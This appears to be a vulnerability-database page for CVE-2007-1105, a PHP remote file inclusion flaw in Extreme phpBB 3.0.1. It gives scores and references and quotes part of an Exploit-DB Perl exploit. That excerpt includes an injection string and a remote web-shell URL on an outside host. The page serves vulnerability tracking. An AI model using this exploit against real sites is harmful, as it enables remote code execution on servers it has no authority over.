CVE-2007-1105
published 2007-02-26CVE-2007-1105: PHP remote file inclusion vulnerability in functions.php in Extreme phpBB (aka phpBB Extreme) 3.0.1 allows remote attackers to execute arbitrary PHP code via a…
PriorityP335medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
2.39%
81.9th percentile
PHP remote file inclusion vulnerability in functions.php in Extreme phpBB (aka phpBB Extreme) 3.0.1 allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| extreme_phpbb | extreme_phpbb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple iOS 7.0.2 - Sim Lock Screen Display Bypass
exploitdb·2013-10-15
CVE-2013-5147 Apple iOS 7.0.2 - Sim Lock Screen Display Bypass
Apple iOS 7.0.2 - Sim Lock Screen Display Bypass
---
Document Title:
Apple iOS 7.2 - Sim Lock Screen Display Bypass Vulnerability
References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1105
Video: http://www.vulnerability-lab.com/get_content.php?id=1104
Release Date:
2013-10-04
Vulnerability Laboratory ID (VL-ID):
1105
Common Vulnerability Scoring System:
6.1
Product & Service Introduction:
iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally unveiled in 2007
for the iPhone, it has been extended to support other Apple devices such as the iPod Touch (September 2007), iPad (January 2010),
iPad Mini (November 2012) and second-generation Apple TV (September 2010). Unlike Microsoft`s Windows Phone and Google`s
Exploit-DB
Extreme phpBB 3.0.1 - 'functions.php' Remote File Inclusion
exploitdb·2007-02-24
CVE-2007-1105 Extreme phpBB 3.0.1 - 'functions.php' Remote File Inclusion
Extreme phpBB 3.0.1 - 'functions.php' Remote File Inclusion
---
# (C) xoron
#
# [Name: phpBB Extreme 3.0.1 (phpbb_root_path) Remote File Include Exploit ]
#
# [Author: xoron]
# [Exploit coded by xoron]
#
# [Download: http://sourceforge.net/project/showfiles.php?group_id=95900 ]
#
# [Tesekkurler: pang0, DJR]
#
# [POC: /includes/functions.php?phpbb_root_path=http://evilscripts?]
#
# [Vuln Codes: include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );x );
#
#
$rfi = "functions.php?phpbb_root_path=";
$path = "/includes/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = ; chop($dil);
if($dil eq "English"){
print "(c) xoron\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan xoron\n";
&ex;
No writeups or analysis indexed.
http://osvdb.org/36957http://www.securityfocus.com/bid/22708http://www.vupen.com/english/advisories/2007/0733https://exchange.xforce.ibmcloud.com/vulnerabilities/32685https://www.exploit-db.com/exploits/3370http://osvdb.org/36957http://www.securityfocus.com/bid/22708http://www.vupen.com/english/advisories/2007/0733https://exchange.xforce.ibmcloud.com/vulnerabilities/32685https://www.exploit-db.com/exploits/3370
2007-02-26
Published